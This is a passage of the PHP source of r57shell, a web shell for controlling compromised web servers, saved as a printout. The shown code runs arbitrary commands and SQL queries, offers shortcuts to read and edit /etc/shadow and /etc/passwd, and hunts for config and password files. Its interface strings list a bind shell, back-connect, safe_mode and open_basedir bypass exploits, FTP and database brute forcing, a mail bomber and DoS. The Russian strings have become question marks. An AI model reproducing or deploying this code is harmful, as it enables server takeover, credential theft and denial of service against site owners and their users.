size=-2>&nbsp;",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
echo "</table>"; } break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; } } } } } echo "<br><form name=form method=POST>"; echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cmd',0,'db_query'); echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value="".$sql- >base.""></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=" Run SQL query "></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
]</b></font></div>"; die(); } if(isset($_GET['12'])) { @unlink(__FILE__); } if(isset($_GET['11'])) { @unlink($tempdir.'bdpl'); @unlink($tempdir.'back'); @unlink($tempdir.'bd'); @unlink($tempdir.'bd.c'); @unlink($tempdir.'dp'); @unlink($tempdir.'dpc'); @unlink($tempdir.'dpc.c'); @unlink($tempdir.'prxpl'); @unlink($tempdir.'grep.txt'); } if(isset($_GET['2'])) { echo $head; function U_value($value) { if ($value == '') return '<i>no value</i>'; if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; if ($value === null) return 'NULL'; if (@is_object($value)) $value = (array) $value; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
if (@is_array($value)) { @ob_start(); print_r($value); $value = @ob_get_contents(); @ob_end_clean(); } return U_wordwrap((string) $value); } function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); } if (@function_exists('ini_get_all')) { $r = ''; echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; foreach (@ini_get_all() as $key=>$value) { $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=- 2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=- 2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; } echo $r; echo '</table>'; } file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); } if(isset($_GET['3'])) { echo $head; echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; $cpuf = @file("cpuinfo"); if($cpuf) { $c = @sizeof($cpuf); for($i=0;$i<$c;$i++) { $info = @explode(":",$cpuf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; } echo $r; } else { echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; } echo '</table>'; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
die(); } if(isset($_GET['4'])) { echo $head; echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; $memf = @file("meminfo"); if($memf) { $c = sizeof($memf); for($i=0;$i<$c;$i++) { $info = explode(":",$memf[$i]); if($info[1]==""){ $info[1]="---"; } $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; } echo $r; } else { echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; } echo '</table>'; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
} if(isset($_GET['5'])) {$_POST['cmd'] = 'systeminfo';} if(isset($_GET['6'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';} if(isset($_GET['7'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';} if(isset($_GET['8'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';} if(isset($_GET['9'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';} if(isset($_GET['10'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';} if(isset($_GET['13'])) {$_POST['cmd']='cat /proc/cpuinfo';} if(isset($_GET['14'])) {$_POST['cmd']='cat /proc/version';} if(isset($_GET['15'])) {$_POST['cmd'] = 'free';} if(isset($_GET['16'])) {$_POST['cmd'] = 'dmesg(8)';} if(isset($_GET['17'])) {$_POST['cmd'] = 'vmstat';} if(isset($_GET['18'])) {$_POST['cmd'] = 'lspci';} if(isset($_GET['19'])) file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
{$_POST['cmd'] = 'lsdev';} if(isset($_GET['20'])) {$_POST['cmd']='cat /proc/interrupts';} if(isset($_GET['21'])) {$_POST['cmd'] = 'cat /etc/*realise';} if(isset($_GET['22'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';} if(isset($_GET['23'])) {$_POST['cmd'] = 'lsattr -va';} if(isset($_GET['24'])) {$_POST['cmd'] = 'w';} if(isset($_GET['25'])) {$_POST['cmd'] = 'who';} if(isset($_GET['26'])) {$_POST['cmd'] = 'uptime';} if(isset($_GET['27'])) {$_POST['cmd'] = 'last -n 10';} if(isset($_GET['28'])) {$_POST['cmd'] = 'ps -aux';} if(isset($_GET['29'])) {$_POST['cmd'] = 'service --status-all';} if(isset($_GET['30'])) {$_POST['cmd'] = 'ifconfig';} if(isset($_GET['31'])) {$_POST['cmd'] = 'netstat -a';} if(isset($_GET['32'])) {$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';} file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
if(isset($_GET['33'])) {$_POST['cmd'] = 'fdisk -l';} if(isset($_GET['34'])) {$_POST['cmd'] = 'df -h';} #if(isset($_GET[''])) # {$_POST['cmd'] = '';} $lang=array( 'ru_butt1' =>'?????????', 'ru_butt2' =>'?????????', 'ru_butt3' =>'???????', 'ru_butt4' =>'?????????', 'ru_butt5' =>'?????????', 'ru_butt6' =>'???????', 'ru_butt7' =>'???????', 'ru_butt8' =>'?????????', 'ru_butt9' =>'????', 'ru_butt10'=>'?????????', 'ru_butt11'=>'?????????????', 'ru_butt12'=>'?????', 'ru_butt13'=>'???????/???????', 'ru_butt14'=>'???????', 'ru_butt15'=>'?????????', 'ru_text1' =>'??????????? ???????', 'ru_text2' =>'?????????? ?????? ?? ???????', 'ru_text3' =>'????????? ???????', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
'ru_text4' =>'??????? ??????????', 'ru_text5' =>'???????? ?????? ?? ??????', 'ru_text6' =>'????????? ????', 'ru_text7' =>'??????', 'ru_text8' =>'???????? ?????', 'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', 'ru_text10'=>'??????? ????', 'ru_text11'=>'?????? ??? ???????', 'ru_text12'=>'back-connect', 'ru_text13'=>'IP-?????', 'ru_text14'=>'????', 'ru_text15'=>'???????? ?????? ? ?????????? ???????', 'ru_text16'=>'????????????', 'ru_text17'=>'????????? ????', 'ru_text18'=>'????????? ????', 'ru_text19'=>'Exploits', 'ru_text20'=>'????????????', 'ru_text21'=>'????? ???', 'ru_text22'=>'datapipe', 'ru_text23'=>'????????? ????', 'ru_text24'=>'????????? ????', 'ru_text25'=>'????????? ????', 'ru_text26'=>'????????????', 'ru_text28'=>'?????? ? safe_mode', 'ru_text29'=>'?????? ????????', 'ru_text30'=>'???????? ?????', 'ru_text31'=>'???? ?? ??????', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
'ru_text32'=>'?????????? PHP ????', 'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL (PHP <= 4.4.2, 5.1.4)', 'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', 'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', 'ru_text36'=>'???? . ???????', 'ru_text37'=>'?????', 'ru_text38'=>'??????', 'ru_text39'=>'????', 'ru_text40'=>'???? ??????? ???? ??????', 'ru_text41'=>'????????? ? ?????', 'ru_text42'=>'?????????????? ?????', 'ru_text43'=>'????????????? ????', 'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', 'ru_text45'=>'???? ????????', 'ru_text46'=>'???????? phpinfo()', 'ru_text47'=>'???????? ???????? php.ini', 'ru_text48'=>'???????? ????????? ??????', 'ru_text49'=>'???????? ??????? ? ???????', 'ru_text50'=>'?????????? ? ??????????', 'ru_text51'=>'?????????? ? ??????', 'ru_text52'=>'????? ??? ??????', 'ru_text53'=>'?????? ? ?????', 'ru_text54'=>'????? ?????? ? ??????', 'ru_text55'=>'?????? ? ??????', 'ru_text56'=>'?????? ?? ???????', 'ru_text57'=>'???????/??????? ????/??????????', 'ru_text58'=>'???', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
'ru_text59'=>'????', 'ru_text60'=>'??????????', 'ru_text61'=>'???? ??????', 'ru_text62'=>'?????????? ???????', 'ru_text63'=>'???? ??????', 'ru_text64'=>'?????????? ???????', 'ru_text65'=>'???????', 'ru_text66'=>'???????', 'ru_text67'=>'Chown/Chgrp/Chmod', 'ru_text68'=>'???????', 'ru_text69'=>'????????1', 'ru_text70'=>'????????2', 'ru_text71'=>"?????? ???????? ???????:rn- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) rn- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) rn- ??? ??????? CHMOD - ????? ????? ? ???????????? ?? ??????????? (???????? 0777)", 'ru_text72'=>'????? ??? ??????', 'ru_text73'=>'?????? ? ?????', 'ru_text74'=>'?????? ? ??????', 'ru_text75'=>'* ????? ???????????? ?????????? ?????????', 'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', 'ru_text80'=>'???', 'ru_text81'=>'????', 'ru_text82'=>'???? ??????', 'ru_text83'=>'?????????? SQL ???????', 'ru_text84'=>'SQL ??????', 'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ??????? ', 'ru_text86'=>'?????????? ????? ? ???????', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????', 'ru_text88'=>'??????:????', 'ru_text89'=>'???? ?? ftp ???????', 'ru_text90'=>'????? ????????', 'ru_text91'=>'???????????? ?', 'ru_text92'=>'??? ?????.', 'ru_text93'=>'FTP', 'ru_text94'=>'FTP-????????', 'ru_text95'=>'?????? ?????????????', 'ru_text96'=>'?? ??????? ???????? ?????? ?????????????', 'ru_text97'=>'????????? ??????????: ', 'ru_text98'=>'??????? ???????????: ', 'ru_text99'=>'/etc/passwd', 'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????', 'ru_text101'=>'???????????? (user -> resu)', 'ru_text102'=>'?????', 'ru_text103'=>'???????? ??????', 'ru_text104'=>'???????? ????? ?? ???????? ????', 'ru_text105'=>'????', 'ru_text106'=>'??', 'ru_text107'=>'????', 'ru_text108'=>'????? ??????', 'ru_text109'=>'????????', 'ru_text110'=>'??????????', 'ru_text111'=>'SQL-?????? : ????', 'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)', 'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ??????? file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
??????? imap_list() (PHP <= 5.1.2)', 'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ????????? ????? imap_body() (PHP <= 5.1.2)', 'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? [compress.zlib://] (PHP <= 4.4.2, 5.1.2)', 'ru_text116'=>'?????????? ????', 'ru_text117'=>'?', 'ru_text118'=>'???? ??????????', 'ru_text119'=>'?? ??????? ??????????? ????', 'ru_text120'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ????????? ????? ini_restore() (PHP <= 4.4.4, 5.1.6) by NST', 'ru_text121'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ????? ????????? fopen() (PHP v4.4.0 memory leak) by NST', 'ru_text122'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ????? ????????? glob() (PHP <= 5.2.x)', 'ru_text123'=>'???????? ??????????? ?????? ??????????? open_basedir, ?????? *.bzip ?????? [compress.bzip2://] (PHP <= 5.2.1)', 'ru_text124'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ?????? ? error_log(php://) (PHP <= 5.1.4, 4.4.2)', 'ru_text125'=>'??????', 'ru_text126'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ?????? ? ??????? [NULL-byte] (PHP <= 5.2.0)', 'ru_text127'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ?????? ? readfile(php://) (PHP <= 5.2.1, 4.4.4)', 'ru_text128'=>'???? ?????????/??????? ????? (touch)', 'ru_text129'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ? fopen(srpath://) (PHP v5.2.0)', 'ru_text130'=>'???????? ??????????? ?????? ??????????? open_basedir, ?????? *.zip ?????? [zip://] (PHP <= 5.2.1)', 'ru_text131'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ??????????? ????? ? ??????? ??????? symlink() (PHP <= 5.2.1)', 'ru_text132'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ????? ????????? symlink() (PHP <= 5.2.1)', 'ru_text133'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ?????? ? ??????? file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
(TMPDIR) (PHP <= 5.2.4)', 'ru_text134'=>'???????? ??? ??????', 'ru_text135'=>'???????', 'ru_text136'=>'???????? ?????????? ??????', 'ru_text137'=>'????????', 'ru_text138'=>'???????', 'ru_text139'=>'????-??????', 'ru_text140'=>'DoS', 'ru_text141'=>'?????????! ???????? ???? ???-???????.', 'ru_text142'=>'????????? ???????', 'ru_text143'=>'Temp: ', 'ru_text144'=>'Test bypass safe_mode with load file in mysqli', 'ru_text145'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ????? ????????? realpath() (PHP <= 5.2.4)', 'ru_text146'=>'MAX ???-?? ????????', 'ru_text147'=>'', 'ru_text148'=>'', 'ru_text149'=>'', 'ru_text150'=>'', 'ru_err0'=>'??????! ?? ???? ???????? ? ???? ', 'ru_err1'=>'??????! ?? ???? ????????? ???? ', 'ru_err2'=>'??????! ?? ??????? ??????? ', 'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????', 'ru_err4'=>'?????? ??????????? ?? ftp ???????', 'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????', 'ru_err6'=>'??????! ?? ??????? ????????? ??????', 'ru_err7'=>'?????? ??????????', /* --------------------------------------------------------------- */ file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
'eng_butt1' =>'Execute', 'eng_butt2' =>'Upload', 'eng_butt3' =>'Bind', 'eng_butt4' =>'Connect', 'eng_butt5' =>'Run', 'eng_butt6' =>'Change', 'eng_butt7' =>'Show', 'eng_butt8' =>'Test', 'eng_butt9' =>'Dump', 'eng_butt10'=>'Save', 'eng_butt11'=>'Edit file', 'eng_butt12'=>'Find', 'eng_butt13'=>'Create/Delete', 'eng_butt14'=>'Download', 'eng_butt15'=>'Send', 'eng_text1' =>'Executed command', 'eng_text2' =>'Execute command on server', 'eng_text3' =>'Run command', 'eng_text4' =>'Work directory', 'eng_text5' =>'Upload files on server', 'eng_text6' =>'Local file', 'eng_text7' =>'Aliases', 'eng_text8' =>'Select alias', 'eng_text9' =>'Bind port to /bin/bash', 'eng_text10'=>'Port', 'eng_text11'=>'Password for access', 'eng_text12'=>'back-connect', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
'eng_text13'=>'IP', 'eng_text14'=>'Port', 'eng_text15'=>'Upload files from remote server', 'eng_text16'=>'With', 'eng_text17'=>'Remote file', 'eng_text18'=>'Local file', 'eng_text19'=>'Exploits', 'eng_text20'=>'Use', 'eng_text21'=>'&nbsp;New name', 'eng_text22'=>'datapipe', 'eng_text23'=>'Local port', 'eng_text24'=>'Remote host', 'eng_text25'=>'Remote port', 'eng_text26'=>'Use', 'eng_text28'=>'Work in safe_mode', 'eng_text29'=>'ACCESS DENIED', 'eng_text30'=>'Cat file', 'eng_text31'=>'File not found', 'eng_text32'=>'Eval PHP code', 'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', 'eng_text34'=>'Test bypass safe_mode with include function', 'eng_text35'=>'Test bypass safe_mode with load file in mysql', 'eng_text36'=>'Database . Table', 'eng_text37'=>'Login', 'eng_text38'=>'Password', 'eng_text39'=>'Database', 'eng_text40'=>'Dump database table', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
'eng_text41'=>'Save dump in file', 'eng_text42'=>'Edit files', 'eng_text43'=>'File for edit', 'eng_text44'=>'Can't edit file! Only read access!', 'eng_text45'=>'File saved', 'eng_text46'=>'Show phpinfo()', 'eng_text47'=>'Show variables from php.ini', 'eng_text48'=>'Delete temp files', 'eng_text49'=>'Delete script from server', 'eng_text50'=>'View cpu info', 'eng_text51'=>'View memory info', 'eng_text52'=>'Find text', 'eng_text53'=>'In dirs', 'eng_text54'=>'Find text in files', 'eng_text55'=>'Only in files', 'eng_text56'=>'Nothing :(', 'eng_text57'=>'Create/Delete File/Dir', 'eng_text58'=>'name', 'eng_text59'=>'file', 'eng_text60'=>'dir', 'eng_text61'=>'File created', 'eng_text62'=>'Dir created', 'eng_text63'=>'File deleted', 'eng_text64'=>'Dir deleted', 'eng_text65'=>'Create', 'eng_text66'=>'Delete', 'eng_text67'=>'Chown/Chgrp/Chmod', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
'eng_text68'=>'Command', 'eng_text69'=>'param1', 'eng_text70'=>'param2', 'eng_text71'=>"Second commands param is:rn- for CHOWN - name of new owner or UIDrn- for CHGRP - group name or GIDrn- for CHMOD - 0777, 0755...", 'eng_text72'=>'Text for find', 'eng_text73'=>'Find in folder', 'eng_text74'=>'Find in files', 'eng_text75'=>'* you can use regexp', 'eng_text76'=>'Search text in files via find', 'eng_text80'=>'Type', 'eng_text81'=>'Net', 'eng_text82'=>'Databases', 'eng_text83'=>'Run SQL query', 'eng_text84'=>'SQL query', 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', 'eng_text86'=>'Download files from server', 'eng_text87'=>'Download files from remote ftp-server', 'eng_text88'=>'server:port', 'eng_text89'=>'File on ftp', 'eng_text90'=>'Transfer mode', 'eng_text91'=>'Archivation', 'eng_text92'=>'without arch.', 'eng_text93'=>'FTP', 'eng_text94'=>'FTP-bruteforce', 'eng_text95'=>'Users list', 'eng_text96'=>'Can't get users list', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
'eng_text97'=>'checked: ', 'eng_text98'=>'success: ', 'eng_text99'=>'/etc/passwd', 'eng_text100'=>'Send file to remote ftp server', 'eng_text101'=>'Use reverse (user -> resu)', 'eng_text102'=>'Mail', 'eng_text103'=>'Send email', 'eng_text104'=>'Send file to email', 'eng_text105'=>'To', 'eng_text106'=>'From', 'eng_text107'=>'Subj', 'eng_text108'=>'Mail', 'eng_text109'=>'Hide', 'eng_text110'=>'Show', 'eng_text111'=>'SQL-Server : Port', 'eng_text112'=>'Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)', 'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2)', 'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2)', 'eng_text115'=>'Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)', 'eng_text116'=>'Copy from', 'eng_text117'=>'to', 'eng_text118'=>'File copied', 'eng_text119'=>'Cant copy file', 'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', 'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', 'eng_text122'=>'Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x)', 'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
'eng_text124'=>'Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)', 'eng_text125'=>'Data', 'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', 'eng_text127'=>'Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)', 'eng_text128'=>'Modify/Access file (touch)', 'eng_text129'=>'Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', 'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', 'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)', 'eng_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)', 'eng_text133'=>'Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)', 'eng_text134'=>'Database-bruteforce', 'eng_text135'=>'Dictionary', 'eng_text136'=>'Creating evil symlink', 'eng_text137'=>'Useful', 'eng_text138'=>'Dangerous', 'eng_text139'=>'Mail Bomber', 'eng_text140'=>'DoS', 'eng_text141'=>'Danger! Web-daemon crash possible.', 'eng_text142'=>'Downloaders', 'eng_text143'=>'Temp: ', 'eng_text144'=>'Test bypass safe_mode with load file in mysqli', 'eng_text145'=>'Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4)', 'eng_text146'=>'Max Interation', 'eng_text147'=>'', 'eng_text148'=>'', 'eng_text149'=>'', 'eng_text150'=>'', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
'eng_err0'=>'Error! Can't write in file ', 'eng_err1'=>'Error! Can't read file ', 'eng_err2'=>'Error! Can't create ', 'eng_err3'=>'Error! Can't connect to ftp', 'eng_err4'=>'Error! Can't login on ftp server', 'eng_err5'=>'Error! Can't change dir on ftp', 'eng_err6'=>'Error! Can't sent mail', 'eng_err7'=>'Mail send', ); /* ?????? ?????? ????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) ?? ?????? ???? ????????? ??? ???????? ???????. */ $aliases=array( '----------------------------------locate'=>'', 'locate httpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate httpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate vhosts.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate vhosts.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate proftpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate proftpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate psybnc.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate psybnc.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate my.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate my.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate admin.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate admin.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate cfg.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate cfg.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate conf.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate conf.php >> '.$tempdir.'grep.txt;cat file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
'.$tempdir.'grep.txt', 'locate config.dat files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.dat >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate config.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate config.inc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.inc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate config.inc.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.inc.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate config.default.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.default.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate .conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".conf" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate .pwd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".pwd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate .sql files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".sql" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate 